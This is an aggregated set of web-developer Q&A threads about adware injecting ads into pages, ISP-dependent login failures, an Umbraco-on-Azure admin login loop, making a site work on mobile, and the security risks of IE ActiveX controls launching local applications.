I had a strange issue from one of my customers this morning, who use my web application. Apparently they are getting "ads" within the browser window when using my application.
I do not put ads in at all. It a straight forward asp.net web application.
What I believe is happening in this case is that the end user has some malware on their pc which "hops" onto their browser session to display their "wares". It could happen to any website they are perusing I guess. I recommended they scan their pc with Malwarebytes.
Is this something that is under the control of the end user, or are there things web application developers can do to prevent this happening. Also some pointers as to how these "ad browser hijackers" work would be good.
Thanks.
Related
I'm an rather experienced web developer and have Plesk Onyx running on my dedicated server. It features 2FA via Google Authenticator. Inside Plesk, I added multiple WordPress-based webpages of mine and friends of mine. All of these WordPress installations are securely installed by Plesk and hardened access to by moving the admin area, globally disabling comments, 2FA, and so on.
Now a few days ago, a friend told me he was seeing massive ads on my webpage. Since the server also yields my company's page, that is perhaps something to take serious - so did I. However, I couldn't reproduce the ads or the pop ups, etc. - at all -, neither on my Windows machines (10 and Server 2016), nor on any mobile or laptop device. Yesterday, I was viewing my webpage with a friend of mine (desktop PC). And all of a sudden, ads are shown up when he clicks links in my WP menu and stuff like this. Very pushy, very much, absolutely... unacceptable.
I introduced myself as rather experienced web developer. However, I don't know how to tackle this. Whether my server was actually hacked or compromised, some WordPress plugin is messing up with ads (however, friend found problems on multiple sites that are not using the same plugins), or whatever. I think Plesk and WP are both strong and shouldn't be compromised that easy. Besides, I didn't notice any further.
How to tackle this?
Did you try Revisium Antivirus to scan your websites? It is available on Plesk extensions. I had a similar issue and Revisium Antivirus found all the files that were infected.
Also, check your friend's PC (web browser) for malware. There is some malware (hidden software) which can run adds or add strange links to your website. So, in that case, there is nothing to do with your server or websites.
My website is working with some ISP while it is not working with others. Also not working from other countries.
The app is hosted at our company. Developed using sharepoint asp.net.
The app works at my home.
But if I visit the website at my brother's home who is registered to different ISP, the website opens and a login dialog appears. When entering correct username and password then submit , textboxs cleared and dialog come again.
The problem is happening with many visitors.
I just want to know what would be the problem! Does anyone faced such problem before?
I checked all IIS restrictions. There is no restrictions made.
I created a new app using sharepoint with login page and it works great.
somebody said that users with public ip can access the site while others with dhcp cannot. Can somebody explain that !
Some ISPs have transparent proxies in use. And some of them are accidentally (or even intentionally) broken and cache more, than they should. You can check whether that's the problem:
Set up your server to also allow https and then use that. You should move to https for privacy reasons anyways, so just do it now ;)
This way, the proxy can't do anything but to pass the data between client and server unmodified.
If that is not an option: Use tcpdump/wireshark/other-sniffer on both - client and server - at the same time and compare the logs. Did the second access even make it to the server?
Do you have a laptop/tablet/smartphone with which you can access the web server? Try moving that laptop from one location to the other and check, whether it works with that one laptop using one ISP and fails with the same laptop on the other ISP.
This should be a comment, but I do not have enough to post it as such.
Are sure that it is not a browser issue?
Is the login dialog from SharePoint, your app or the browser itself?
If it is from your app, can you debug it or write the log-in attempts in a log?
I have recently installed a website project on Azure and that was relatively easy to do thanks to great docs online. We are having a problem with the back office (admin) login though, it's a bit strange, as it didn't happen straight away, I shall elaborate....
When I go to http://www.keelycattschoolofdance.co.uk/umbraco/ it takes me to the login page, which seems fine.
(The url at this point becomes www.keelycattschoolofdance.co.uk/.../login.aspx)
I then login, which works and it starts to display the admin panels but then bounces back to the login and the URL becomes www.keelycattschoolofdance.co.uk/.../login.aspx
I am running this on Azure using the Accelerator, latest version of Umbraco and using SQL CE 4.0 rather than SQL Server.
has anyone seen this before?
Please let me know if you need more information, I shall respond :-)
Thanks in advance
Nick
It sounds like it may be a Session error. This is a problem for Azure and Umbraco because Azure uses round robin load balancing.
The normal way of setting up an Umbraco site using the accelerator would be to have a separate session DB where the shared session state is stored.
Make sure you are using this accelerator for Umbraco on Azure as it's the latest and best.
http://waacceleratorumbraco.codeplex.com/
We have several large production sites using this and I can confirm they all work fine (including the backend editing environment).
Things to watch out for are that you need to follow the instructions closely as they are easy to get wrong :-)
Make sure you don't have dashes in your db names as this makes things go wrong as well.
Finally if you are using more than one web role the Umbraco preview can sometimes yellow screen, as the preview XML may not be on the server that gets to the preview request. This is again because of the round robin load balancing.
I am developing a site that is tested only in Firefox and IE. Now I need to make the site accessible from mobile also.
So I need to know whether I need to calculate the time needed to shift the site. Is this created as a new application or the same application is modified?
When accessing stackoverflow.com from my mobile the design is entire changed. How is this done? Is it a separate application?
Thanks
Whether or not you need to create a new application for mobile depends on the site you have. The website at my workplace could not possibly fit on a mobile phone screen (too many frames), but other sites that have a more adjustment-friendly layout might just need a little tweak.
I would test your site on a mobile browser emulator, there are a bunch of them listed on this site.
Also, you might consider switching your firefox's user agent (here) so you can browse popular site's mobile versions, along with the source they used to lay it out.
Usually different CSS templates chosen using UA string matching. My phone has a fairly fully enabled web browser on it, so I get the whole of stackoverflow the same.
Some phone browser may also "mobile optimise" the layout, or in the case of opera mini, it does it on opera's proxy server and then sends modified data to the phone.
Javascript support is more of a problem, expect it to be minimal in most cases, although it is getting better.
I know this might be a no-brainer, but please read on.
I also know it's generally not considered a good idea, maybe the worst, to let a browser run and interact with local apps, even in an intranet context.
We use Citrix for home-office, and people really like it. Now, they would like the same kind of environment at work, a nice page where every important application/document/folder is nicely arranged and classified in an orderly fashion. These folks are not particularly tech savvy; I don't even consider thinking that they could understand the difference between remote delivered applications and local ones.
So, I've been asked if it's possible. Of course, it is, with IE's good ol' ActiveX controls. And I even made a working prototype (that's where it hurts).
But now, I doubt. Isn't it madness to allow such 'dangerous' ActiveX controls, even in the 'local intranet' zone? People will use the same browser to surf the web, can I fully trust IE? Isn't there a risk that Microsoft would just disable those controls in future updates/versions? What if a website, or any kind of malware, just put another site on the trust list? With that extent of control, you could as well uninstall every protection and just run amok 'till you got hanged by the IT dept.
I'm about to confront my superiors with the fact that, even if they saw it is doable, it would be a very bad thing. So I'm desperately in need of good and strong arguments, because "let's don't" won't do it.
Of course, if there is nothing to be scared of, that'll be nice too. But I strongly doubt that.
We use Citrix for home-office, and people really like it. Now, they would like the same kind of environment at work, a nice page where every important application/document/folder is nicely arranged and classified in an orderly fashion
I haven't used Citrix very many times, but what's it got to do with executing local applications? I don't see how "People like Citrix" and "browser executing local applications" relate at all?
If the people are accessing your Citrix server from home, and want the same experience in the office, then buy a cheap PC, and run the exact same Citrix software they run on their home computers. Put this computer in the corner and tell them to go use it. They'll be overjoyed.
Isn't it madness to allow such 'dangerous' ActiveX controls, even in the 'local intranet' zone ? People will use the same browser to surf the web, can I fully trust IE ?
Put it this way. IE has built-in support for AX controls. It uses it's security mechanisms to prevent them from running unless in a trusted site. By default, no sites are trusted at all.
If you use IE at all then you're putting yourself at the mercy of these security mechanisms. Whether or not you tell it to trust the local intranet is beside the point, and isn't going to affect the operation of any other zones.
The good old security holes that require you to reboot your computer every few weeks when MS issues a patch will continue to exist and cause problems, regardless of whether you allow ActiveX in your local intranet.
Isn't there a risk that Microsoft would just disable those controls in future updates / versions ?
Since XP-SP2, Microsoft has been making it increasingly difficult to use ActiveX controls. I don't know how many scary looking warning messages and "This might destroy your computer" dialogs you have to click through these days to get them to run, but it's quite a few. This will only get worse over time.
Microsoft is walking a fine line. On one hand, they regularly send ActiveX killbits with Windows Update to remove/disable applications that have been misbehaving. On the other hand, the latest version of Sharepoint 2007 (can't speak for earlier versions) allows for Office documents to be opened by clicking a link in the browser, and edited in the local application. When the edit is finished, the changes are transmitted back to the server and the webpage (generally) is refreshed. This is only an IE thing, as Firefox will throw up an error message.
I can see the logic behind it, though. Until Microsoft gets all of their apps 'in the cloud', there are cases that need to bridge the gap between the old client-side apps and a more web-centric business environment. While there is likely a non-web workaround, more and more information workers have come to expect that a large portion of their work will be done in a browser. Anything that makes the integration with the desktop easier is not going to be opposed by anyone except the sysadmins.
The standard citrix homepage (or how we use it) is a simple web page with program icons. Click on it, and the application get's delivered to you. People want the same thing, at work, with their applications/folders/documents. And because I'm a web developer, and they asked me, I do it with a web page... Perhaps I should pass the whole thing over to the VB guy..
Ahh... I know of 2 ways to accomplish this:
You can embed internet explorer into an application, and hook into it and intercept certain kinds of URL's and so on
I saw this done a few years ago - a telephony application embedded internet explorer in itself, and loaded some specially formatted webpages.
In the webpage there was this:
Call John Smith
Normally this would be a broken URL, but when the user clicked on this link, the application containing the embedded IE got notified, and proceeded to execute it's own custom code to dial the number from the URL.
You could get your VB guy to write an application which basically just wraps IE, and has handlers for executing applications. You could then code normal webpages with links to just open applications, and the VB app would launch them. This allows you to write your own security stuff (like, only launch applications in a preset list, or so on) into the VB app, and because VB is launching them, not IE, none of the IE security issues will be involved.
The second way is with browser plug-ins.
For example, skype comes with a Firefox plug-in, which looks for phone-numbers in web-pages, and attaches special links to them. When you click on these links it invokes skype - you could conceivably do something similar for launching your citrix apps.
You'd then be tied to firefox though. Writing plugins for IE is much harder than for FF, I wouldn't go down that path unless forced to.